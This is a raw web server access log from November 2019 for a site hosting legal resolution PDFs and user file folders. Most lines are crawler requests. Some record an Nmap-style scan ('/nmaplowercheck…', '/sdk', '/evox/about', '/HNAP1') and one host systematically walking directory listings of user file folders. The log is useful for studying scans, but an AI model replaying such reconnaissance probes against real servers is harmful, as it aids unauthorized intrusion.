192.99.6.226 - - [09/Nov/2019:03:03:40 -0500] "GET /StormSDA/userFiles/user_files/87/?C=D;O=A/ HTTP/1.1" 200 813
208.100.26.231 - - [09/Nov/2019:03:03:52 -0500] "GET / HTTP/1.0" 200 9990
69.162.124.232 - - [09/Nov/2019:03:03:57 -0500] "HEAD / HTTP/1.1" 200 -
192.99.6.226 - - [09/Nov/2019:03:04:15 -0500] "GET /StormSDA/userFiles/user_files/87/?C=M;O=A/ HTTP/1.1" 200 813
192.99.6.226 - - [09/Nov/2019:03:04:41 -0500] "GET /StormSDA/userFiles/user_files/87/?C=N;O=D/ HTTP/1.1" 200 813
192.99.6.226 - - [09/Nov/2019:03:05:04 -0500] "GET /StormSDA/userFiles/user_files/87/?C=S;O=A/ HTTP/1.1" 200 813
66.249.65.250 - - [09/Nov/2019:03:05:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6797.pdf HTTP/1.1" 200 323409
192.99.6.226 - - [09/Nov/2019:03:05:38 -0500] "GET /StormSDA/userFiles/user_files/?C=D;O=A/ HTTP/1.1" 200 8984
208.100.26.231 - - [09/Nov/2019:03:05:49 -0500] "HEAD / HTTP/1.1" 200 -
208.100.26.231 - - [09/Nov/2019:03:05:49 -0500] "GET / HTTP/1.0" 200 9990
208.100.26.231 - - [09/Nov/2019:03:05:49 -0500] "GET / HTTP/1.1" 200 9990
208.100.26.231 - - [09/Nov/2019:03:05:50 -0500] "POST /sdk HTTP/1.1" 404 1018
208.100.26.231 - - [09/Nov/2019:03:05:50 -0500] "GET /nmaplowercheck1573286680 HTTP/1.1" 404 1018
208.100.26.231 - - [09/Nov/2019:03:05:50 -0500] "GET /evox/about HTTP/1.1" 404 1018
208.100.26.231 - - [09/Nov/2019:03:05:50 -0500] "GET /HNAP1 HTTP/1.1" 404 1018
192.168.175.104 - - [09/Nov/2019:03:05:56 -0500] "GET / HTTP/1.0" 200 9990
192.168.175.104 - - [09/Nov/2019:03:05:57 -0500] "GET / HTTP/1.1" 200 9990
54.36.150.36 - - [09/Nov/2019:03:06:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20951-1000/00000970.tif HTTP/1.1" 200 103316
192.99.6.226 - - [09/Nov/2019:03:06:19 -0500] "GET /StormSDA/userFiles/user_files/?C=N;O=A/ HTTP/1.1" 200 8984
66.249.65.250 - - [09/Nov/2019:03:06:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6454.pdf HTTP/1.1" 200 76125
46.229.161.131 - - [09/Nov/2019:03:06:35 -0500] "HEAD /POT-2013/Cartografia/Anexo01_Sistema_Hidrico.pdf HTTP/1.1" 200 -
66.249.65.252 - - [09/Nov/2019:03:06:41 -0500] "GET /BLA/resoluciones/AUTOS%202009/2249.pdf HTTP/1.1" 200 121259
192.99.6.226 - - [09/Nov/2019:03:06:54 -0500] "GET /StormSDA/userFiles/user_files/?C=S;O=A/ HTTP/1.1" 200 8984
179.7.193.17 - - [09/Nov/2019:03:07:00 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.7.193.17 - - [09/Nov/2019:03:07:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.7.193.17 - - [09/Nov/2019:03:07:00 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.65.254 - - [09/Nov/2019:03:07:23 -0500] "GET /BLA/resoluciones/AUTOS%202009/3303.pdf HTTP/1.1" 200 207536
66.249.65.250 - - [09/Nov/2019:03:07:34 -0500] "GET /BLA/resoluciones/AUTOS%202012/1405.pdf HTTP/1.1" 200 235148
192.99.6.226 - - [09/Nov/2019:03:07:35 -0500] "GET /galeria/?C=D;O=D/ HTTP/1.1" 200 3296
66.249.65.250 - - [09/Nov/2019:03:07:45 -0500] "GET /BLA/resoluciones/Autos%202008/2406.pdf HTTP/1.1" 200 68843
66.249.65.250 - - [09/Nov/2019:03:07:52 -0500] "GET /BLA/resoluciones/AUTOS%202012/1503.pdf HTTP/1.1" 200 316007
192.99.6.226 - - [09/Nov/2019:03:08:02 -0500] "GET /galeria/carrusel/?C=N;O=D/ HTTP/1.1" 200 971
66.249.65.250 - - [09/Nov/2019:03:08:05 -0500] "GET /BLA/resoluciones/Autos%202008/1799.pdf HTTP/1.1" 200 89357
66.249.65.252 - - [09/Nov/2019:03:08:12 -0500] "GET /resoluciones/RESOLUCIONES%202010/2053.pdf HTTP/1.1" 404 1018
66.249.65.252 - - [09/Nov/2019:03:08:27 -0500] "GET /BLA/resoluciones/AUTOS%202012/1351.pdf HTTP/1.1" 200 409389
66.249.65.250 - - [09/Nov/2019:03:08:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2501.pdf HTTP/1.1" 200 623530
192.99.6.226 - - [09/Nov/2019:03:08:43 -0500] "GET /galeria/galeria/?C=D;O=A/ HTTP/1.1" 200 3177
66.249.65.250 - - [09/Nov/2019:03:08:53 -0500] "GET /resoluciones/RESOLUCIONES%202009/0082.pdf HTTP/1.1" 404 1018
69.162.124.232 - - [09/Nov/2019:03:08:57 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.250 - - [09/Nov/2019:03:08:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1497.pdf HTTP/1.1" 200 499323
66.249.65.250 - - [09/Nov/2019:03:09:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6622.pdf HTTP/1.1" 200 311338
192.99.6.226 - - [09/Nov/2019:03:09:23 -0500] "GET /galeria/galeria/?C=M;O=A/ HTTP/1.1" 200 3177
66.249.65.250 - - [09/Nov/2019:03:09:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7000.pdf HTTP/1.1" 200 271000
66.249.65.250 - - [09/Nov/2019:03:09:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5078.pdf HTTP/1.1" 200 497905
66.249.65.250 - - [09/Nov/2019:03:09:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1138.pdf HTTP/1.1" 200 263991
66.249.65.197 - - [09/Nov/2019:03:09:52 -0500] "GET /portel_dama/libreria/php/2006/restauracion/55_artic/xtras/13.pdf HTTP/1.1" 404 1019
192.99.6.226 - - [09/Nov/2019:03:09:58 -0500] "GET /galeria/galeria/?C=N;O=D/ HTTP/1.1" 200 3177
